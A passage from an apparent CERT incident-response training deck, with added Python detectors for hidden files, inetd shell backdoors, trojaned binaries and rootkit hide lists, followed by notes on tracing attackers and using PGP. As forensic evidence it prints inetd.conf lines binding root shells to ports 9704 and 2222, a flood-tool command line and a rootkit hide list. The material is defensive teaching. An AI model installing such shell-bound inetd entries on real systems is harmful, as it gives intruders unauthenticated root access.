    find / -user root -perm -4000 -print        (setuid root; the leading - means "at least these bits")
- -name pattern: files whose name matches the pattern
Compare the setuid list against a known-good host or the package database; a new setuid root binary that is not part of any package is the classic left-behind root shell.
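An added example (not from the original deck) that does the sweep the find commands above describe in one pass: it flags the dot/space names from the hidden-directory slide, regular files under /dev, setuid-root binaries and recently changed files. The decision logic is kept pure (a list of path, mode, uid, ctime records) so it can be checked on constructed data; collect() gathers those fields from a real tree with lstat, and the main block builds a throwaway tree to scan. A Unix file system is assumed.

```python
"""find-style sweep for the hiding places listed on the preceding slides:
dot/space directory names, regular files under /dev, setuid-root binaries
and recently changed files.  Added example, not from the original deck.
audit_records() is pure so it can be checked on constructed records;
collect() gathers the same fields from a real tree (assumes Unix)."""
import os
import re
import stat
import tempfile
import time

CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def suspicious_name(name):
    """Return why a file name looks chosen to be overlooked, or None."""
    if name in (".", ".."):
        return None
    if re.fullmatch(r"\.{3,}", name):
        return "dots-only name"
    if name.strip() == "":
        return "whitespace-only name"
    if name != name.strip():
        return "leading/trailing whitespace in name"
    if CONTROL.search(name):
        return "control character in name"
    return None


def audit_records(records, now, recent_days=10, dev_prefix="/dev/"):
    """records: iterable of (path, st_mode, st_uid, st_ctime).
    Returns [(path, [reason, ...]), ...] for entries worth a look."""
    cutoff = now - recent_days * 86400
    findings = []
    for path, mode, uid, ctime in records:
        reasons = []
        why = suspicious_name(os.path.basename(path))
        if why:
            reasons.append(why)
        if path.startswith(dev_prefix) and stat.S_ISREG(mode):
            reasons.append("regular file under /dev")
        if mode & stat.S_ISUID and uid == 0:
            reasons.append("setuid root")
        if ctime >= cutoff:
            reasons.append(f"changed within {recent_days} days")
        if reasons:
            findings.append((path, reasons))
    return findings


def collect(root):
    """Walk root like find, using lstat so symlinks are not followed."""
    out = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            out.append((p, st.st_mode, st.st_uid, st.st_ctime))
    return out


if __name__ == "__main__":
    # Build a throwaway tree with the classic hidden names and scan it.
    with tempfile.TemporaryDirectory() as root:
        for d in ("...", ". ", "..  "):
            os.mkdir(os.path.join(root, d))
        with open(os.path.join(root, "...", "sniffer.log"), "w") as fh:
            fh.write("captured\n")
        for path, why in audit_records(collect(root), time.time()):
            print(repr(path), "->", ", ".join(why))
```

ctime is used rather than mtime because touch can set mtime to any value while ctime only moves when the inode changes; a rootkit installer that restores mtime still leaves ctime at install time unless the clock itself is reset.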
- Intrusion trace tracking & backdoor detection - netstat
- Shows listening ports and the state of connections
    # netstat -a -p
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 insecure.kisa.or.k:9704 bluebird.certcc.o:62491 ESTABLISHED 1660/sh
    tcp        0      0 *:9704                  *:*                     LISTEN      340/inetd
    tcp        0      0 *:6000                  *:*                     LISTEN      514/Xwrapper
    tcp        0      0 *:www                   *:*                     LISTEN      474/httpd
    tcp        0      0 *:login                 *:*                     LISTEN      340/inetd
    tcp        0      0 *:shell                 *:*                     LISTEN      340/inetd
    tcp        0      0 *:telnet                *:*                     LISTEN      340/inetd
    tcp        0      0 *:ftp                   *:*                     LISTEN      340/inetd
    # tail /etc/inetd.conf
    linuxconf stream tcp wait   root /bin/linuxconf linuxconf --http
    9704      stream tcp nowait root /bin/sh        sh -i
Port 9704 is served by inetd and has an established connection whose handler is sh: the backdoor from inetd.conf is in use at this moment. On a rootkitted host netstat itself may hide such lines, so run a known-good copy from the forensic CD, or port-scan the host from another machine and compare.

- Intrusion trace tracking & backdoor detection - ps
- Lists the running processes
    # ps aux
    USER       PID %CPU %MEM  VSZ  RSS TTY   STAT START  TIME COMMAND
    hcjung     649  0.0  0.7 1704  948 pts/2 S    Apr19  0:00 -bash
    root       661  0.0  0.6 1944  860 pts/2 S    Apr19  0:00 su -
    root       662  0.0  0.7 1744 1000 pts/2 S    Apr19  0:00 -bash
    root      1279  0.0  1.5 4176 1976 tty1  S    Apr20  0:00 hanterm
    root      1281  0.0  0.7 1744  984 pts/4 S    Apr20  0:00 -bash
    root      1421  0.0  0.5 1584  744 pts/0 S    02:06  0:00 telnet 172.16.2.161
    root      1732  0.0  0.6 1676  884 ?     S    06:01  0:00 sh -i
    root      1735  0.0  0.2 1116  376 ?     SN   06:02  0:00 ./synf 1.1.1.1 172.16.1.161 80 80
Lines to question: a root "sh -i" with no controlling terminal (TTY "?") started at 06:01, and one minute later "./synf 1.1.1.1 172.16.1.161 80 80", apparently a flood tool given a spoofed source address and a target. As with netstat, a trojaned ps hides whatever the rootkit's configuration tells it to, so cross-check against /proc or a clean binary.
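An added example (not from the original deck) that cross-checks the two views on the preceding slides: it audits /etc/inetd.conf for entries whose server program is a shell or whose service field is a bare port number, then matches netstat -a -p output against it to report backdoor ports that are actually listening, ports inetd serves without any enabled entry, and live connections on a flagged port. Both inputs are constructed after the slides; it assumes inetd.conf and netstat use the same name or number for a port (a general version would map both through /etc/services).

```python
"""Cross-check /etc/inetd.conf against netstat -a -p output to spot the kind
of backdoor shown on the preceding slides.  Added example, not from the
original deck; both inputs are constructed after the slide excerpts."""
import os

INETD_CONF = """\
ftp       stream  tcp  nowait  root  /usr/sbin/tcpd   in.ftpd -l -a
telnet    stream  tcp  nowait  root  /usr/sbin/tcpd   in.telnetd
shell     stream  tcp  nowait  root  /usr/sbin/tcpd   in.rshd
#login    stream  tcp  nowait  root  /usr/sbin/tcpd   in.rlogind
exec      stream  tcp  nowait  root  /usr/sbin/tcpd   in.rexecd
linuxconf stream  tcp  wait    root  /bin/linuxconf   linuxconf --http
9704      stream  tcp  nowait  root  /bin/sh          sh -i
2222      stream  tcp  nowait  root  /bin/bash        bash -i
"""

NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 insecure.kisa.or.k:9704 bluebird.certcc.o:62491 ESTABLISHED 1660/sh
tcp        0      0 *:9704                  *:*                     LISTEN      340/inetd
tcp        0      0 *:6000                  *:*                     LISTEN      514/Xwrapper
tcp        0      0 *:www                   *:*                     LISTEN      474/httpd
tcp        0      0 *:login                 *:*                     LISTEN      340/inetd
tcp        0      0 *:shell                 *:*                     LISTEN      340/inetd
tcp        0      0 *:telnet                *:*                     LISTEN      340/inetd
tcp        0      0 *:ftp                   *:*                     LISTEN      340/inetd
"""

SHELLS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh"}


def parse_inetd(text):
    """Yield (service, user, server_path, args) for enabled entries only."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)
        if len(parts) < 6:
            continue
        service, _sock, _proto, _wait, user, server = parts[:6]
        yield service, user, server, parts[6] if len(parts) > 6 else ""


def audit_inetd(text):
    """Return [(service, user, [reason, ...]), ...] for suspicious entries."""
    out = []
    for service, user, server, args in parse_inetd(text):
        argv0 = args.split()[0] if args else ""
        reasons = []
        if os.path.basename(server) in SHELLS or os.path.basename(argv0) in SHELLS:
            reasons.append("server program is a shell")
        if service.isdigit():
            reasons.append("numeric port instead of a service name")
        if reasons:
            out.append((service, user, reasons))
    return out


def parse_netstat(text):
    """Return ({local_port: program}, [(local_port, peer, program), ...])
    for LISTEN sockets and ESTABLISHED connections respectively."""
    listening, established = {}, []
    for line in text.splitlines():
        t = line.split()
        if len(t) < 7 or t[0] not in ("tcp", "tcp6"):
            continue
        local = t[3].rsplit(":", 1)[-1]
        program = t[6].split("/", 1)[-1]
        if t[5] == "LISTEN":
            listening[local] = program
        elif t[5] == "ESTABLISHED":
            established.append((local, t[4], program))
    return listening, established


def correlate(inetd_text, netstat_text):
    """Return [(port, finding), ...] combining the configuration and the
    live socket table."""
    enabled = {svc for svc, _u, _s, _a in parse_inetd(inetd_text)}
    flagged = {svc: why for svc, _u, why in audit_inetd(inetd_text)}
    listening, established = parse_netstat(netstat_text)
    findings = []
    for port, program in listening.items():
        if port in flagged:
            findings.append((port, "listening backdoor entry: " + ", ".join(flagged[port])))
        if program == "inetd" and port not in enabled:
            findings.append((port, "inetd is listening but no enabled inetd.conf entry"))
    for port, peer, program in established:
        if port in flagged:
            findings.append((port, f"active connection from {peer} served by {program}"))
    return findings


if __name__ == "__main__":
    for port, why in correlate(INETD_CONF, NETSTAT):
        print(port, "->", why)
```

The "inetd is listening but no enabled entry" case is as interesting as the shell entries: it means the running inetd was started from a different configuration than the one on disk, or the binary itself was replaced, which is exactly what the rootkit slide warns about.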
- Intrusion trace tracking & backdoor detection - Rootkit
- A package of trojaned programs installed to allow re-entry and to conceal the intrusion
- System file integrity must be verified whenever a system is recovered
- Files replaced by rootkits: login, inetd, rshd, tcpd, crontab, ps, top, pidof, ifconfig, netstat, ls, du, find, syslogd, shell, chfn, chsh, passwd, ...
- Kernel backdoors: KNARK, ADORE, ... (these lie to every user-space tool, including a clean one, so file-level checks alone are not enough)

- Intrusion trace tracking & backdoor detection - Finding trojaned files
- ls -alc   (ctime cannot be reset with touch, unlike mtime and atime)
- truss -t open ./ls   (Solaris)
- strace -e trace=open ./ls   (Linux; on newer kernels add openat: -e trace=open,openat)
    [root@ns1 /bin]# strace -e trace=open ps
    open("/lib/libc.so.6", O_RDONLY) = 3
    open("/dev/null", O_RDONLY|O_NONBLOCK|0x10000) = -1 ENOTDIR (Not a directory)
    open("/usr/src/.puta/.1file", O_RDONLY) = 3
    open(".", O_RDONLY|O_NONBLOCK|0x10000) = 3
    [root@ns1 /bin]# more /usr/src/.puta/.1file
    .1addr
    .1file
    .1logz
    .1proc
    smurf
A genuine ps has no reason to open anything under /usr/src/.puta; the trojaned copy reads its hide list there, the names that ps and ls must never display. The rootkit's own files are at the top of that list.
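An added example (not from the original deck) for the two preceding slides: a hash manifest compared against a known-good baseline, which is what "verify system file integrity" means in practice and what Tripwire automates, plus a scan of strace -e trace=open output for opens of hidden entries under system directories, as in the ps trace above. The baseline and current contents and the strace lines are constructed; the list of system directories is an assumption.

```python
"""Two checks for trojaned binaries: a hash manifest compared with a known-good
baseline (the 'verify system file integrity' step), and a scan of strace
-e trace=open output for opens of hidden rootkit files.  Added example, not
from the original deck; the manifest inputs and strace lines are constructed."""
import hashlib
import os
import re

# Constructed stand-ins for a baseline taken at install time and the same
# paths read back after the incident (real use hashes the actual binaries).
BASELINE_FILES = {
    "bin/ps": b"original ps binary",
    "bin/ls": b"original ls binary",
    "bin/netstat": b"original netstat binary",
}
CURRENT_FILES = {
    "bin/ps": b"trojaned ps that reads /usr/src/.puta/.1proc",
    "bin/ls": b"original ls binary",
    "bin/login": b"replacement login with a magic password",
}

# Constructed strace -e trace=open output, after the slide.
STRACE = """\
open("/lib/libc.so.6", O_RDONLY) = 3
open("/dev/null", O_RDONLY|O_NONBLOCK|0x10000) = -1 ENOTDIR (Not a directory)
open("/usr/src/.puta/.1file", O_RDONLY) = 3
open(".", O_RDONLY|O_NONBLOCK|0x10000) = 3
"""

OPEN_RE = re.compile(r'^open(?:at)?\((?:AT_FDCWD, )?"([^"]+)"')
# Dot-named entries are normal under home directories but not under these.
SYSTEM_ROOTS = ("/usr/src", "/usr/lib", "/lib", "/dev", "/etc", "/bin", "/sbin")


def manifest_from_files(files):
    """files: {path: bytes} -> {path: sha256 hex}."""
    return {p: hashlib.sha256(data).hexdigest() for p, data in files.items()}


def manifest_from_dir(root):
    """Hash every regular file under root (symlinks skipped), keyed by path
    relative to root so baselines from different mounts compare."""
    out = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            if os.path.islink(p) or not os.path.isfile(p):
                continue
            h = hashlib.sha256()
            with open(p, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    h.update(chunk)
            out[os.path.relpath(p, root)] = h.hexdigest()
    return out


def diff_manifests(baseline, current):
    """Return {'added': [...], 'removed': [...], 'modified': [...]}."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
    }


def suspicious_opens(strace_text):
    """Paths opened from hidden (dot-named) entries under system directories."""
    hits = []
    for line in strace_text.splitlines():
        m = OPEN_RE.match(line.strip())
        if not m:
            continue
        path = m.group(1)
        hidden = any(seg.startswith(".") for seg in path.split("/")[1:])
        if hidden and path.startswith(SYSTEM_ROOTS):
            hits.append(path)
    return hits


if __name__ == "__main__":
    print(diff_manifests(manifest_from_files(BASELINE_FILES),
                         manifest_from_files(CURRENT_FILES)))
    print(suspicious_opens(STRACE))
```

The manifest is only as good as where it is kept: store it off the host or on read-only media and compute the current hashes with a clean binary from the forensic CD, because a rootkitted kernel or libc can feed a local hashing tool the original bytes while serving the trojan to everyone else.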
Incident response methods: response measures
- Blocking the attacking site: can itself be turned into a denial of service (spoofed source addresses get innocent sites blocked); use it for DoS attacks or for persistent attacks
- Counter-attack: attacking the attacking system in return (cases seen: US DoD-related sites; mail-bomb attacks by ordinary PC users)
- E-mail response: the method used between CERTs. The attacking system is very often another victim of the same intruder, so notify its operators of the attack by e-mail and request an investigation

Incident response methods: finding the attacking site's contact
- Domain name / IP address conversion
    # nslookup 211.32.119.135
    Server:   certcc.or.kr
    Address:  211.252.150.1
    Name:     www.yahoo.co.kr
    Address:  211.32.119.135
    # nslookup www.yahoo.co.kr
    ...
The reverse record is written by whoever controls the address block and may be chosen to mislead; confirm the forward lookup agrees and check the block's registry entry.

Incident response methods: finding the attacking site's contact
- Using whois
    whois -h whois.server.name domain.name
    whois -h whois.server.name ip.address
- whois servers
    whois.arin.net  : top-level starting point (American Registry for Internet Numbers; refers other regions' blocks to the registries below)
    whois.apnic.net : Asia-Pacific region
    whois.ripe.net  : Europe
    whois.krnic.net : Korean (.kr) domains and address blocks

Incident response methods: finding the attacking site's contact
- Using traceroute
- When the attacking site's contact is hard to find
- When the attacking site does not reply (contact the upstream network that appears in the path instead)
    $ traceroute host3.example-site.edu
    traceroute to host3.example-site.edu (10.72.0.176), 30 hops max
     1  hop1.reporting-site.com (10.112.1.2)  2 ms  2 ms  1 ms
     2  hop2.transit-network.net (10.288.114.254)  2 ms  2 ms  2 ms
     3  hop3.transit-network.net (10.224.137.21)  3 ms  3 ms  5 ms
    ...
    10  hop10.example-site.edu (10.192.33.3)  24 ms  26 ms  26 ms
    11  hop11.example-site.edu (10.72.0.11)  27 ms  25 ms  27 ms
    12  host3.example-site.edu (10.72.0.176)  26 ms  27 ms  26 ms
Incident response methods: finding the attacking site's contact
- Netlab: finger, whois, ping, traceroute, DNS and port scan in one tool

Incident response methods: finding the attacking site's contact
- VisualRoute: graphical traceroute

Incident response methods: contacting an incident response team (CERT)
- Contact the incident response team for the region of the attacking site
- http://www.first.org/team-info/
- Korea: cert@certcc.or.kr

Incident response methods: E-mail
- An efficient way to exchange logs and related information
- Share information; CC: cert@certcc.or.kr
- Role addresses to try at the attacking domain:
    security@domain.name   - security incident contact
    cert@domain.name       - security incident contact
    abuse@domain.name      - network abuse contact
    root@domain.name       - UNIX system administrator
    postmaster@domain.name - e-mail administrator
    webmaster@domain.name  - web server administrator
    ip@domain.name         - the ISP's address allocation administrator
- Telephone: for sensitive incidents, or ones that need fast action, contact the site directly by phone

Incident response methods: analysis tools
    Netlab       http://www.listsoft.com/eng/programs/pr134.htm
    VisualRoute  http://www.visualroute.com
    lsof         ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/
    Tripwire     http://www.tripwire.com/
    tcpdump      http://www.tcpdump.org
    snoop        (bundled with Solaris)
PGP: what is PGP?
- Pretty Good Privacy
- E-mail security tool developed in 1991 by Phil Zimmermann in the United States

PGP: main features
- Encryption: confidentiality
- Digital signature: integrity, user authentication, non-repudiation
- Uses RSA and Diffie-Hellman/DSS
- Public-key based
- Cumulative trust (the web of trust) instead of a single certificate authority

PGP: obtaining PGP
- Download: http://www.pgpi.org/
- Installation and usage: PGP 6.5.1 installation and operation guide, http://www.certcc.or.kr/tools/pgp.html
Building and operating an incident response team (CERT): PGP - Encrypt (screenshot slide)

Building and operating an incident response team (CERT): PGP - Sign (screenshot slide)

Building and operating an incident response team (CERT): PGP - Decrypt & Verify (screenshot slides: <Decrypt> <Verify>)

Building and operating an incident response team (CERT): Q & A